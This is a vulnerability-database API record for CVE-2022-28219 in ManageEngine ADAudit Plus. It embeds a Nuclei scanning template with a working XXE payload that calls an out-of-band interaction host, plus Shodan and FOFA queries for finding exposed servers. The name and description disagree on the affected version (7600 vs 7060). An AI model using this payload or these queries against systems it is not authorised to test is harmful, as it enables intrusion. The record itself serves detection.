{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-28219/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-28219/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-28219/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-28219/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-28219/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-28219"},"sightings":{"href":"/api/v1/sightings/cve-2022-28219"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-28219.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-28219\n\ninfo:\n  name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution\n  author: dwisiswant0\n  severity: critical\n  description: |\n    Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an\n    unauthenticated XML entity injection attack that can lead to remote code execution.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system.\n  remediation: |\n    Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus\n    is configured with a dedicated service account with restricted privileges.\n  reference:\n    - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html\n    - https://www.horizon3.ai/red-team-blog-cve-2022-28219/\n    - https://manageengine.com\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-28219\n    - http://cewolf.sourceforge.net/new/index.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-28219\n    cwe-id: CWE-611\n    epss-score: 0.97193\n    epss-percentile: 0.99894\n    cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: zohocorp\n    product: manageengine_adaudit_plus\n    shodan-query:\n      - http.title:\"ADAudit Plus\" || http.title:\"ManageEngine - ADManager Plus\"\n      - http.title:\"adaudit plus\" || http.title:\"manageengine - admanager plus\"\n    fofa-query: title=\"adaudit plus\" || http.title:\"manageengine - admanager plus\"\n    google-query: intitle:\"adaudit plus\" || http.title:\"manageengine - admanager plus\"\n  tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp,vkev,vuln\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/api/agent/tabs/agentData\"\n\n    body: |\n      [\n        {\n          \"DomainName\": \"{{Host}}\",\n          \"EventCode\": 4688,\n          \"EventType\": 0,\n          \"TimeGenerated\": 0,\n          \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n        }\n      ]\n\n    headers:\n      Content-Type: application/json\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n\n      - type: word\n        part: body\n        words:\n          - \"ManageEngine\"\n# digest: 4a0a00473045022100e4f2f1bbc8fbb7d777d4eb043d7ac467268a627d86bb526f6934412cbad50005022034535f23b7be460bbce77bef5f54f7987c9e197ced303000897c8b51d9d530cb:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-28219"}